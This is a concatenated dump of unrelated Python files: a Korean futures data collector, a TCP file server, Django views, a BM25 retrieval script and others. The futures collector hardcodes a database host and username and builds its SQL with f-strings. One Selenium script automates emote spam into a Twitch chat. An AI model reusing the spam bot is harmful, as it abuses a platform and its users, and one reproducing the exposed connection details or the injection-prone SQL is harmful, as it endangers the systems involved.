f'{dict_tickers[KeyValue.strip()]}_bid1': amts[5],\r\n f'{dict_tickers[KeyValue.strip()]}_bid2': amts[6],\r\n f'{dict_tickers[KeyValue.strip()]}_bid3': amts[7],\r\n f'{dict_tickers[KeyValue.strip()]}_bid4': amts[8],\r\n 
f'{dict_tickers[KeyValue.strip()]}_bid5': amts[9]}, index=[0])\r\n\r\n global df2_out\r\n df2_out = pd.concat([df2_out, temp_df2])\r\n\r\n self.realdata_event_loop.exit()\r\n\r\n\r\ndef get_price_info(szData):\r\n\r\n if szData.split()[0][4:] == '101R9000':\r\n cur_p = float(szData.split()[2])\r\n ask_p = float(szData.split()[11])\r\n bid_p = float(szData.split()[12])\r\n else:\r\n cur_p = float(szData.split()[2])\r\n ask_p = float(szData.split()[12])\r\n bid_p = float(szData.split()[13])\r\n\r\n exec_time = szData.split()[1]\r\n\r\n return exec_time, cur_p, ask_p, bid_p\r\n\r\n\r\ndef get_amt_info(szData):\r\n\r\n ask_1 = int(szData.split()[2].split('.')[1][2:8])\r\n bid_1 = int(szData.split()[2].split('.')[1][8:14])\r\n ask_2 = int(szData.split()[4].split('.')[1][2:8])\r\n bid_2 = int(szData.split()[4].split('.')[1][8:14])\r\n ask_3 = int(szData.split()[6].split('.')[1][2:8])\r\n bid_3 = int(szData.split()[6].split('.')[1][8:14])\r\n ask_4 = int(szData.split()[8].split('.')[1][2:8])\r\n bid_4 = int(szData.split()[8].split('.')[1][8:14])\r\n ask_5 = int(szData.split()[10].split('.')[1][2:8])\r\n bid_5 = int(szData.split()[10].split('.')[1][8:14])\r\n\r\n amts = [ask_5, ask_4, ask_3, ask_2, ask_1, bid_1, bid_2, bid_3, bid_4, bid_5]\r\n\r\n hoga_time = szData.split()[2].split('.')[1][14:]\r\n\r\n return hoga_time, amts\r\n\r\n\r\ndef insert_price_data_to_sql(df):\r\n\r\n df = df.replace(np.nan, 0.0)\r\n global today\r\n\r\n sql = f\"INSERT INTO input_data (Year_Mon_Day, Hour_Min_Sec, KOSPI200, KOSPI200_ask, KOSPI200_bid, \\\r\n USDKRW, USDKRW_ask, USDKRW_bid, NextUSD, NextUSD_ask, NextUSD_bid, KTB10, KTB10_ask, KTB10_bid, \\\r\n KTB3, KTB3_ask, KTB3_bid) \\\r\n VALUES ('{today[:4] + '/' + today[4:6] + '/' + today[6:]}', \\\r\n '{df['exec_time'].item()[:2] + ':' + df['exec_time'].item()[2:4] + ':' + df['exec_time'].item()[4:]}', \\\r\n {df['kospi_cur_p'].item()}, {df['kospi_ask_p'].item()}, {df['kospi_bid_p'].item()}, \\\r\n {df['usd_cur_p'].item()}, {df['usd_ask_p'].item()}, {df['usd_bid_p'].item()}, \\\r\n {df['nextusd_cur_p'].item()}, {df['nextusd_ask_p'].item()}, {df['nextusd_bid_p'].item()}, \\\r\n {df['ktb10_cur_p'].item()}, {df['ktb10_ask_p'].item()}, {df['ktb10_bid_p'].item()}, \\\r\n {df['ktb3_cur_p'].item()}, {df['ktb3_ask_p'].item()}, {df['ktb3_bid_p'].item()})\"\r\n\r\n cursor.execute(sql)\r\n waidb.commit()\r\n\r\n\r\ndef insert_amt_data_to_sql(df):\r\n\r\n df = df.replace(np.nan, 0.0)\r\n global today\r\n\r\n sql = f\"INSERT INTO input_data_amt (Year_Mon_Day, Hour_Min_Sec, \\\r\n KOSPI200_ask5, KOSPI200_ask4, KOSPI200_ask3, KOSPI200_ask2, KOSPI200_ask1, \\\r\n KOSPI200_bid1, KOSPI200_bid2, KOSPI200_bid3, KOSPI200_bid4, KOSPI200_bid5, \\\r\n USDKRW_ask5, USDKRW_ask4, USDKRW_ask3, USDKRW_ask2, USDKRW_ask1, \\\r\n USDKRW_bid1, USDKRW_bid2, USDKRW_bid3, USDKRW_bid4, USDKRW_bid5, \\\r\n NextUSD_ask5, NextUSD_ask4, NextUSD_ask3, NextUSD_ask2, NextUSD_ask1, \\\r\n NextUSD_bid1, NextUSD_bid2, NextUSD_bid3, NextUSD_bid4, NextUSD_bid5, \\\r\n KTB10_ask5, KTB10_ask4, KTB10_ask3, KTB10_ask2, KTB10_ask1, \\\r\n KTB10_bid1, KTB10_bid2, KTB10_bid3, KTB10_bid4, KTB10_bid5, \\\r\n KTB3_ask5, KTB3_ask4, KTB3_ask3, KTB3_ask2, KTB3_ask1, \\\r\n KTB3_bid1, KTB3_bid2, KTB3_bid3, KTB3_bid4, KTB3_bid5) \\\r\n VALUES ('{today[:4] + '/' + today[4:6] + '/' + today[6:]}', \\\r\n '{df['hoga_time'].item()[:2] + ':' + df['hoga_time'].item()[2:4] + ':' + df['hoga_time'].item()[4:]}', \\\r\n {df['kospi_ask5'].item()}, {df['kospi_ask4'].item()}, {df['kospi_ask3'].item()}, {df['kospi_ask2'].item()}, 
{df['kospi_ask1'].item()}, \\\r\n {df['kospi_bid1'].item()}, {df['kospi_bid2'].item()}, {df['kospi_bid3'].item()}, {df['kospi_bid4'].item()}, {df['kospi_bid5'].item()}, \\\r\n {df['usd_ask5'].item()}, {df['usd_ask4'].item()}, {df['usd_ask3'].item()}, {df['usd_ask2'].item()}, {df['usd_ask1'].item()}, \\\r\n {df['usd_bid1'].item()}, {df['usd_bid2'].item()}, {df['usd_bid3'].item()}, {df['usd_bid4'].item()}, {df['usd_bid5'].item()}, \\\r\n {df['nextusd_ask5'].item()}, {df['nextusd_ask4'].item()}, {df['nextusd_ask3'].item()}, {df['nextusd_ask2'].item()}, {df['nextusd_ask1'].item()}, \\\r\n {df['nextusd_bid1'].item()}, {df['nextusd_bid2'].item()}, {df['nextusd_bid3'].item()}, {df['nextusd_bid4'].item()}, {df['nextusd_bid5'].item()}, \\\r\n {df['ktb10_ask5'].item()}, {df['ktb10_ask4'].item()}, {df['ktb10_ask3'].item()}, {df['ktb10_ask2'].item()}, {df['ktb10_ask1'].item()}, \\\r\n {df['ktb10_bid1'].item()}, {df['ktb10_bid2'].item()}, {df['ktb10_bid3'].item()}, {df['ktb10_bid4'].item()}, {df['ktb10_bid5'].item()}, \\\r\n {df['ktb3_ask5'].item()}, {df['ktb3_ask4'].item()}, {df['ktb3_ask3'].item()}, {df['ktb3_ask2'].item()}, {df['ktb3_ask1'].item()}, \\\r\n {df['ktb3_bid1'].item()}, {df['ktb3_bid2'].item()}, {df['ktb3_bid3'].item()}, {df['ktb3_bid4'].item()}, {df['ktb3_bid5'].item()})\"\r\n\r\n cursor.execute(sql)\r\n waidb.commit()\r\n\r\n\r\ndef initialize_df():\r\n\r\n global df_out, df2_out\r\n df_out = pd.DataFrame(columns=['today', 'exec_time', 'kospi_cur_p', 'kospi_ask_p', 'kospi_bid_p',\r\n 'usd_cur_p', 'usd_ask_p', 'usd_bid_p',\r\n 'nextusd_cur_p', 'nextusd_ask_p', 'nextusd_bid_p',\r\n 'ktb10_cur_p', 'ktb10_ask_p', 'ktb10_bid_p',\r\n 'ktb3_cur_p', 'ktb3_ask_p', 'ktb3_bid_p'], index=[1])\r\n df2_out = pd.DataFrame(columns=['today', 'hoga_time',\r\n 'kospi_ask5', 'kospi_ask4', 'kospi_ask3', 'kospi_ask2', 'kospi_ask1',\r\n 'kospi_bid1', 'kospi_bid2', 'kospi_bid3', 'kospi_bid4', 'kospi_bid5',\r\n 'usd_ask5', 'usd_ask4', 'usd_ask3', 'usd_ask2', 'usd_ask1',\r\n 'usd_bid1', 'usd_bid2', 'usd_bid3', 'usd_bid4', 'usd_bid5',\r\n 'nextusd_ask5', 'nextusd_ask4', 'nextusd_ask3', 'nextusd_ask2', 'nextusd_ask1',\r\n 'nextusd_bid1', 'nextusd_bid2', 'nextusd_bid3', 'nextusd_bid4', 'nextusd_bid5',\r\n 'ktb10_ask5', 'ktb10_ask4', 'ktb10_ask3', 'ktb10_ask2', 'ktb10_ask1',\r\n 'ktb10_bid1', 'ktb10_bid2', 'ktb10_bid3', 'ktb10_bid4', 'ktb10_bid5',\r\n 'ktb3_ask5', 'ktb3_ask4', 'ktb3_ask3', 'ktb3_ask2', 'ktb3_ask1',\r\n 'ktb3_bid1', 'ktb3_bid2', 'ktb3_bid3', 'ktb3_bid4', 'ktb3_bid5'], index=[1])\r\n\r\n\r\ndef check_insert_data(datr, latest_data):\r\n\r\n # manipulate df in order to compare and save the latest price data to DB server\r\n if datr.shape[0] == 2 and datr.index[0] == 1:\r\n # delete first row which only has NaN values\r\n datr.drop(1, inplace=True)\r\n latest_data = datr.tail(1)\r\n # insert first data to sql server\r\n if len(datr.columns) <= 20:\r\n insert_price_data_to_sql(latest_data)\r\n else:\r\n insert_amt_data_to_sql(latest_data)\r\n\r\n if datr.shape[0] == 3 and datr.index[0] == 1:\r\n datr.drop(1, inplace=True)\r\n temp_data = datr.head(1)\r\n latest_data = datr.tail(1)\r\n # insert last data to sql server\r\n if len(datr.columns) <= 20:\r\n insert_price_data_to_sql(temp_data)\r\n insert_price_data_to_sql(latest_data)\r\n else:\r\n insert_amt_data_to_sql(temp_data)\r\n insert_amt_data_to_sql(latest_data)\r\n\r\n if datr.shape[0] >= 2:\r\n if len(datr.columns) <= 20:\r\n if latest_data['exec_time'].item() != datr.tail(1)['exec_time'].item():\r\n # change the last_data\r\n latest_data = 
datr.tail(1)\r\n                # insert the last data to sql server\r\n                insert_price_data_to_sql(latest_data)\r\n        else:\r\n            if latest_data['hoga_time'].item() != datr.tail(1)['hoga_time'].item():\r\n                # change the last_data\r\n                latest_data = datr.tail(1)\r\n                # insert the last data to sql server\r\n                insert_amt_data_to_sql(latest_data)\r\n\r\n    return datr, latest_data\r\n\r\n# TR Code : common quote inquiry (FZQ12011)\r\n# Instrument Code : KOSPI200 index, last trading day in September (101R9000)\r\n# Instrument Code : USD/KRW currency, last trading day in July (175R7000) / 175<year><month>000 (year - R:2021, S:2022 / months 2~9 are digits, 10,11,12 are A,B,C)\r\n# Instrument Code : 10-year Korea Treasury Bond, last trading day in September (167R9000)\r\n# Instrument Code : 3-year Korea Treasury Bond, last trading day in September (165R9000)\r\nkospi = '101R9000'\r\nusd = '175R7000'\r\nnextusd = '175R8000'\r\nktb10 = '167R9000'\r\nktb3 = '165R9000'\r\ntickers = [kospi, usd, nextusd, ktb10, ktb3]\r\ndict_tickers = {'101R9000': 'kospi', '175R7000': 'usd', '175R8000': 'nextusd', '167R9000': 'ktb10', '165R9000': 'ktb3'}\r\nglobal today\r\ntoday = dt.datetime.now(pytz.timezone('Asia/Seoul')).strftime('%Y%m%d')\r\n\r\n# path for saving file in Dropbox\r\ndpb_path = 'C:\\\\Users\\\\waikorea\\\\Dropbox\\\\datafeed\\\\'\r\n# path for saving file in local computer\r\nlocal_path = 'C:\\\\Users\\\\waikorea\\\\Desktop\\\\NH\\\\CSV\\\\'\r\n\r\n# create engine to connect to DB server\r\nengine = create_engine(\"mysql+mysqldb://limpst:\" + dbpwd + \"@119.205.211.179/waikorea_port\", encoding='utf-8')\r\n\r\n# initialize DataFrame to save the data\r\nglobal last_data, last_data2\r\nlast_data = pd.DataFrame()\r\nlast_data2 = pd.DataFrame()\r\n\r\n# start the per-second data collection program\r\nif __name__ == \"__main__\":\r\n\r\n    # create QApp object\r\n    app = QApplication(sys.argv)\r\n\r\n    # create QAxWidget object\r\n    nh = NH()\r\n\r\n    # connect to the server\r\n    nh.connect_server()\r\n\r\n    # log-in\r\n    nh.login()\r\n\r\n    start_t = '090000' # start receiving data at 9:00\r\n    end_t = '153459' # end receiving data at 15:35\r\n\r\n    reg_ids = []\r\n    for ticker in tickers:\r\n        reg_id = nh.reg_real_data('SB_FUT_EXEC', ticker)\r\n        reg_id2 = nh.reg_real_data('SB_FUT_HOGA', ticker)\r\n        reg_ids.append(reg_id)\r\n        reg_ids.append(reg_id2)\r\n\r\n    if len(reg_ids) == len(tickers)*2:\r\n        print('registered for real-time data')\r\n    else:\r\n        print('some tickers have not been registered')\r\n\r\n    # initialize dfs to store data\r\n    initialize_df()\r\n\r\n    # while loop for starting the data receiving event at 9:00\r\n    while True:\r\n        now = dt.datetime.now(pytz.timezone('Asia/Seoul')).strftime('%H%M%S')\r\n\r\n        # start the process at 9:00\r\n        if now >= start_t:\r\n\r\n            # start the receiving event loop\r\n            nh.start_loop()\r\n\r\n            # initialize dfs every 5 seconds in order to reduce the process time\r\n            if (int(now[4:]) % 5) == 0:\r\n                initialize_df()\r\n\r\n            # concat all the price data and delete duplicate lines\r\n            df_out.drop_duplicates(subset=['exec_time'], inplace=True)\r\n            # check and insert price data to DB server\r\n            df_out, last_data = check_insert_data(df_out, last_data)\r\n\r\n            # concat all the amt data and delete duplicate lines\r\n            df2_out.drop_duplicates(subset=['hoga_time'], inplace=True)\r\n            # check and insert amt data to DB server\r\n            df2_out, last_data2 = check_insert_data(df2_out, last_data2)\r\n\r\n        # break the while loop at 15:35\r\n        if now >= end_t:\r\n            print('Market closed')\r\n            break\r\n\r\n    checks = 0\r\n    for reg_id in reg_ids:\r\n        check = nh.unreg_real_data(reg_id)\r\n        if check:\r\n            checks += 1\r\n\r\n    if checks == len(reg_ids):\r\n        print('unregistered complete')\r\n    else:\r\n        print('some ids are not 
unregistered yet')\r\n\r\n # read data from sql server and save it as csv file in both Dropbox and local computer\r\n price_data = pd.read_sql(\"input_data\", con=engine, index_col='SEQ')\r\n price_data.to_csv(dpb_path + 'kor_fut_prices_' + today + '.csv', header=True, index=False)\r\n price_data.to_csv(local_path + 'kor_fut_prices_' + today + '.csv', header=True, index=False)\r\n amt_data = pd.read_sql(\"input_data_amt\", con=engine, index_col='SEQ')\r\n amt_data.to_csv(dpb_path + 'kor_fut_amts_' + today + '.csv', header=True, index=False)\r\n amt_data.to_csv(local_path + 'kor_fut_amts_' + today + '.csv', header=True, index=False)\r\n\r\n time.sleep(5)\r\n\r\n # connect to DB and delete the sql table data when the market closes\r\n try:\r\n # create connection instance\r\n waidb = mysql.connector.connect(\r\n host='119.205.211.179',\r\n user='limpst',\r\n password=dbpwd,\r\n database='waikorea_port')\r\n # create cursor instance\r\n cursor = waidb.cursor()\r\n # write sql query\r\n sql_trunc_query = \"\"\"TRUNCATE TABLE input_data\"\"\"\r\n sql_trunc_query2 = \"\"\"TRUNCATE TABLE input_data_amt\"\"\"\r\n sql_query = [sql_trunc_query, sql_trunc_query2]\r\n # execute sql query\r\n for query in sql_query:\r\n cursor.execute(query)\r\n waidb.commit()\r\n print('SQL table cleared')\r\n\r\n # raise error if there is any\r\n except mysql.connector.Error as e:\r\n print(e)\r\n\r\n # close the DB connection\r\n finally:\r\n if waidb.is_connected():\r\n cursor.close()\r\n waidb.close()\r\n print('connection closed')\r\n\r\n print('data collection task finished')\r\n","sub_path":"kor_fut_data2db.py","file_name":"kor_fut_data2db.py","file_ext":"py","file_size_in_byte":18822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167977708","text":"#Author:ike yang\r\nimport socket\r\nimport os\r\nimport json\r\nfrom my_socket import tran_recv\r\nserver_file_path=os.path.join(os.getcwd(),'server_file')\r\n# print(server_file_path)\r\nfile_list=os.listdir(server_file_path)\r\n\r\nsk=socket.socket()\r\n\r\nsk.bind(('127.0.0.1',8086))\r\nsk.listen()\r\nconn,addr=sk.accept()\r\nmy_sk=tran_recv(conn)\r\n\r\nmy_sk.json_data_trans(file_list)\r\nclient_choose=my_sk.data_recv()\r\nmy_sk.file_trans(server_file_path,client_choose)\r\n\r\n\r\n\r\n\r\nconn.close()\r\nsk.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"TCP_trans_data/tcp_FIleServer.py","file_name":"tcp_FIleServer.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"398264108","text":"from django.shortcuts import render, redirect\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom django.views.generic import ListView, FormView, DeleteView\nfrom django.urls import reverse_lazy\n\nfrom wordbook.forms import WordAddForm\nfrom wordbook.models.wordbook import Wordbook\n\nfrom django.core.paginator import Paginator\n\nfrom django.contrib import messages\n\nfrom bootstrap_modal_forms.mixins import PassRequestMixin\n\n\n@method_decorator([login_required], name='dispatch')\nclass HomeView(ListView):\n model = Wordbook\n paginate_by = 12\n template_name = 'wordbook/home.html'\n\n def get(self, request, *args, **kwargs):\n queryset_list = Wordbook.exec_query(request.user.pk)\n paginator = Paginator(queryset_list, self.paginate_by)\n\n page = self.request.GET.get('page')\n\n queryset = paginator.get_page(page)\n context = {\n 
'queryset': queryset,\n }\n return render(request, 'wordbook/home.html', context)\n\n\n@method_decorator([login_required], name='dispatch')\nclass WordAddView(FormView):\n form_class = WordAddForm\n template_name = 'wordbook/word_add.html'\n success_url = reverse_lazy('wordbook:home')\n\n def get_form_kwargs(self):\n kwargs = super(WordAddView, self).get_form_kwargs()\n kwargs['user'] = self.request.user\n return kwargs\n\n def post(self, request, *args, **kwargs):\n form = WordAddForm(request.POST, user=request.user)\n if not form.is_valid():\n return render(request, 'wordbook/word_add.html', {'form': form})\n form.save(commit=True)\n messages.success(request, \"'%s' has been just added\" % form.cleaned_data['adding_word'])\n return redirect('wordbook:home')\n\n\n@method_decorator([login_required], name='dispatch')\nclass WordDeleteView(DeleteView):\n model = Wordbook\n success_url = reverse_lazy('wordbook:home')\n\n def get(self, request, *args, **kwargs):\n return self.post(request, *args, **kwargs)","sub_path":"wordbook/views/wordbook.py","file_name":"wordbook.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210863701","text":"# StringifyNumbers --> Write a function that takes in an object and finds all the values which are numbers and converts \n# them to strings. \n\ndef stringifyNumbers(obj):\n for key,value in obj.items():\n if type(value) is int:\n obj[key] = str(value)\n elif type(value) is dict:\n stringifyNumbers(value)\n else:\n pass\n return obj\n\n\nobj1 = {\n \"num\": 1,\n \"test\": [],\n \"data\": {\n \"val\": 4,\n \"info\": {\n \"isRight\": True,\n \"random\": 66\n }\n }\n}\n\nprint(stringifyNumbers(obj1))\n\nobj1 = {\n \"num\": '1',\n \"test\": [],\n \"data\": {\n \"val\": '4',\n \"info\": {\n \"isRight\": True,\n \"random\": '66'\n }\n }\n}","sub_path":"src/interview_questions/recursionAndDynamicProgramming/easy/stringifyNumbers.py","file_name":"stringifyNumbers.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"295325093","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport sys, os\nimport time, math\n\nclass Message():\n def __init__(self, user, message):\n self.user = user\n self.message = message\n def __eq__(self, other):\n return self.message == other.message\n\n\nif os.name == \"nt\":\n driverPath = \"Miscellaneous/driver/chromedriver_2.24.exe\"\nelse :\n driverPath = \"Miscellaneous/driver/chromedriver\"\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=C:\\\\Users\\\\Akshay L Aradhya\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Twitch Test\")\ndriver = webdriver.Chrome(chrome_options=options, executable_path=driverPath)\ndriver.get('https://www.twitch.tv/tyrant_theviper')\n\nchatID = \"ember2478\"\nip = input(\"Chat ID : \");\nif ip != \"\":\n chatID = \"ember\"+ip\n\nwhile True:\n\n textbox = driver.find_element_by_id(chatID)\n\n size = input(\"Enter Size : \")\n size = int(size)\n delay = input(\"Enter Delay : \")\n delay = float(delay)\n\n stringList = [\"deIlluminati\", \"Kappa\", \"PJSalt\", \"BloodTrail\", \"PogChamp\"]\n\n for i in range(1, size):\n string = ' '.join(stringList[:i][::-1])\n textbox.send_keys(string)\n textbox.send_keys(Keys.ENTER)\n time.sleep(delay)\n\n for i in range(size, 0, -1):\n string = ' '.join(stringList[:i][::-1])\n textbox.send_keys(string)\n 
textbox.send_keys(Keys.ENTER)\n        time.sleep(delay)\n\n\n\n\n","sub_path":"Miscellaneous/Twitch_Chat_Bot.py","file_name":"Twitch_Chat_Bot.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624712920","text":"from utils import *\nimport pickle\nimport gensim\nimport re\nfrom pyhanlp import *\nimport pynlpir\nimport os\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport operator as op\nfrom gensim.summarization.bm25 import BM25\n\ndef check_q_and_context(train_ids, train_dict, context_dict):\n    while True:\n        print('='*30)\n        qid = input('Enter the question id (1~5000) [press Q to quit]')\n        if qid == 'Q':\n            break\n        qid = train_ids[int(qid)-1]\n        question = train_dict.get(qid).get('question')\n        docid = train_dict.get(qid).get('docid')\n        context = context_dict.get(docid)\n        print('Q: {}'.format(question))\n        print('context: {}'.format(context))\n        print('=' * 30)\n\n\n\ndef cal_sim_QandC_by_dfs(question_f, context_vocab, restore=True):\n    save_path = path.get('result')\n    if os.path.exists(save_path) and restore:\n        print('./result_dfs.pkl already exists')\n        result = load_pkl_data(save_path)\n    else:\n        result = {}\n        with tqdm(total=len(question_f)) as pbar:\n            for q_item in question_f:\n                question = q_item.get('question')\n                isBad = q_item.get('isBad')\n                true_docid = q_item.get('docid')\n                qid = q_item.get('id')\n\n                if isBad:\n                    continue\n                else:\n                    doc_scores = []\n                    for docid, doc_dfs in context_vocab.items():\n                        score = 0\n                        for q_word in question:\n                            score += doc_dfs.get(q_word, 0)\n                        doc_scores.append([docid, score])\n                    doc_scores.sort(key=op.itemgetter(1), reverse=True)\n                    result[qid] = {\n                        'true_docid': true_docid,\n                        'id': qid,\n                        'doc_scores': doc_scores,\n                    }\n                pbar.update(1)\n        save_pkl_data(result, save_path)\n    return result\n\n\ndef cal_top_acc(result, context_dict, K):\n    correct = [0 for _ in range(K)]\n    bad_samples = []\n    with tqdm(total=len(result)) as pbar:\n        for k in range(K):\n            pbar.reset()\n            pbar.set_description('compute top-{} acc'.format(k+1))\n            for _id, item in enumerate(result):\n                true_docid = item['docid']\n                # answer_start, answer_end = item['answer_span']\n                docids = item['text_ids']\n                top_K_docids = [text_id for text_id in docids[:k+1]]\n                for docid in top_K_docids:\n\n                    if true_docid == docid:\n                        correct[k] += 1\n                        break\n                    # doc_start = doc[\"start\"]\n                    # text_length = len(doc[\"text\"])\n                    # doc_end = doc_start + text_length - 1\n                    # if answer_start >= doc_start and answer_start <= doc_end:\n                    #     if answer_end <= doc_end:\n                    #         correct[k] += 1\n                    #         break\n\n                pbar.update(1)\n    for k in range(K):\n        print('top-{} acc is {:.2%}'.format(k+1, correct[k]*1.0/len(result)))\n\n\ndef cal_MAP(result):\n    with tqdm(total=len(result)) as pbar:\n        AP = []\n        for _id, item in result.items():\n            true_docid = item['true_docid']\n            doc_scores = item['doc_scores']\n            doc_scores = [doc_id for doc_id, _ in doc_scores]\n            true_docid_rank = doc_scores.index(true_docid) + 1\n            P = 1 / true_docid_rank\n            AP.append(P)\n            pbar.update(1)\n        MAP = np.array(AP).mean()\n    print('MAP is {:.2%}'.format(MAP))\n\n\ndef build_list_and_idmap(train_dict, context_dict, path=None):\n    question_list = []\n    question_idmap = {}\n\n    context_list = []\n    context_idmap = {}\n\n    with tqdm(total=len(train_dict)) as pbar:\n        pbar.set_description('build list_and_idmap of train_dict')\n        for index, item in enumerate(train_dict.items()):\n            _id, _item = item\n            question = _item['question']\n            word_li = HanLP.segment(question)\n            for word in word_li:\n                question_list.append(word.word)\n\n            # 
question_list.append(pynlpir.segment(question, pos_tagging=False))\n question_idmap[_id] = str(index)\n question_idmap[str(index)] = _id\n pbar.update(1)\n\n if path and os.path.exists(path.get('context_idmap')) and os.path.exists(path.get('context_list')):\n context_list = load_pkl_data(path.get('context_list'))\n context_idmap = load_pkl_data(path.get('context_idmap'))\n else:\n with tqdm(total=len(context_dict)) as pbar:\n pbar.set_description('build list_and_idmap of context_dict')\n for index, item in enumerate(context_dict.items()):\n _id, doc = item\n # word_li = HanLP.segment(doc[\"text\"])\n # for word in word_li:\n # context_list.append(word.word)\n context_list.append(pynlpir.segment(doc[\"text\"], pos_tagging=False))\n # context_list.append(pynlpir.get_key_words(doc[\"text\"]))\n context_idmap[_id] = str(index)\n context_idmap[str(index)] = _id\n pbar.update(1)\n save_pkl_data(context_list, path.get('context_list'))\n save_pkl_data(context_idmap, path.get('context_idmap'))\n\n\n return question_list, question_idmap, context_list, context_idmap\n\n\ndef get_test_with_doc(test, bm25_model, context_idmap, k=5):\n test_with_doc = []\n with tqdm(total=len(test)) as pbar:\n pbar.set_description('build test_with doc in top-{}'.format(k))\n for item in test:\n question = item['question']\n qid = item['id']\n q_cut = []\n word_li = HanLP.segment(question)\n for word in word_li:\n q_cut.append(word.word)\n\n # q_cut = pynlpir.segment(question, pos_tagging=False)\n bm25_score = bm25_model.get_scores(q_cut)\n bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n bm25_score.sort(key=op.itemgetter(1), reverse=True)\n best_doc_id = [item[0] for item in bm25_score[:k]]\n test_sample = {\n 'qid': qid,\n 'question': question,\n 'contexts': best_doc_id,\n }\n test_with_doc.append(test_sample)\n pbar.update(1)\n save_pkl_data(test_with_doc, './test_with_doc_top{}.pkl'.format(k))\n\n\ndef get_train_with_doc(train, bm25_model, context_idmap, k=5):\n save_path = '../data/rank/train_with_doc_top{}.pkl'.format(k)\n if os.path.exists(save_path):\n train_with_doc = load_pkl_data(save_path)\n else:\n train_with_doc = []\n with tqdm(total=len(train)) as pbar:\n pbar.set_description('build train with doc in top-{}'.format(k))\n for item in train:\n question = item['question']\n qid = item['qid']\n # q_cut = []\n # # word_li = HanLP.segment(question)\n # for word in word_li:\n # q_cut.append(word.word)\n q_cut = pynlpir.segment(question, pos_tagging=False)\n # q_cut = pynlpir.get_key_words(question)\n bm25_score = bm25_model.get_scores(q_cut)\n bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n bm25_score.sort(key=op.itemgetter(1), reverse=True)\n best_text_id = [item[0] for item in bm25_score[:k]]\n # if item['docid'] in best_doc_id:\n # answer = item['answer']\n\n train_sample = {\n 'qid': qid,\n 'question': question,\n 'text_ids': best_text_id,\n 'answer': item['answer'],\n 'answer_span': item['answer_span'],\n \"docid\":item['docid']\n }\n\n train_with_doc.append(train_sample)\n pbar.update(1)\n save_pkl_data(train_with_doc, save_path)\n return train_with_doc\n\n\n\nif __name__ == '__main__':\n pynlpir.open()\n path = {\n 'train': '../data/train_data1.pkl',\n 'test': '../data/test_data.pkl',\n 'documents': '../data/policies_context.pkl',\n 'train_dict': '../data/rank/train_dict_y.pkl',\n 'context_dict': './data/rank/context_dict2_y.pkl',\n 'context_corpus': '../data/rank/context_corpus_y.pkl',\n 'result': 
'../data/rank/result_bm25_y.pkl',\n 'bad_samples': '../data/rank/bad_samples_y.pkl',\n 'context_list': '../data/rank/context_list_y.pkl',\n 'context_idmap': '../data/rank/context_idmap_y.pkl',\n 'BM25_model': '../data/rank/BM25_model_y.gen'\n }\n\n if os.path.exists(path.get('result')) and True:\n result = load_pkl_data(path.get('result'))\n else:\n train = load_pkl_data(path.get('train'))\n test = load_pkl_data(path.get('test'))\n context = load_pkl_data(path.get('documents'))\n\n train_dict, train_ids = get_train_dict_and_ids(path.get('train_dict'), train)\n context_dict = get_context_dict(path.get('context_dict'), context)\n question_list, question_idmap, context_list, context_idmap = build_list_and_idmap(train_dict, context_dict, path)\n\n bm25_model = BM25(context_list)\n\n train_data = get_train_with_doc(train, bm25_model, context_idmap, 30)\n\n # result = {}\n # with tqdm(total=len(question_list)) as pbar:\n # pbar.set_description('compute bm25 for each question')\n # for index, question in enumerate(question_list):\n # qid = question_idmap[str(index)]\n # true_docid = train_dict[qid]['docid']\n # bm25_score = bm25_model.get_scores(question)\n # bm25_score = [[context_idmap[str(index)], score] for index, score in enumerate(bm25_score)]\n # bm25_score.sort(key=op.itemgetter(1), reverse=True)\n #\n # result[qid] = {\n # 'true_docid': true_docid,\n # 'id': qid,\n # 'doc_scores': bm25_score,\n # }\n # pbar.update(1)\n #\n # save_pkl_data(result, path.get('result'))\n cal_top_acc(train_data, context_dict, K=30)\n # cal_MAP(result)\n\n print('end')\n pynlpir.close()","sub_path":"retrieve/rank_by_bm25.py","file_name":"rank_by_bm25.py","file_ext":"py","file_size_in_byte":10589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"302409953","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('name', models.CharField(max_length=128)),\n ('slug', models.SlugField(max_length=128, unique=True)),\n ('date', models.DateField(help_text='e.g. the date the project was started or first made publicly available.')),\n ('project_url', models.URLField(blank=True, help_text='Link to project homepage or \"project overview\" style pages.')),\n ('demo_url', models.URLField(blank=True, help_text='Link to somewhere the user can try the project out.')),\n ('source_url', models.URLField(blank=True, help_text='Link to public Git repo, etc.')),\n ('image', models.ImageField(blank=True, upload_to='', help_text='Logo or screenshot. Requires Pillow to be installed.')),\n ('technologies', models.CharField(max_length=128, help_text='List what the project was built with here.')),\n ('description', models.TextField(help_text='Describe what the project does. 
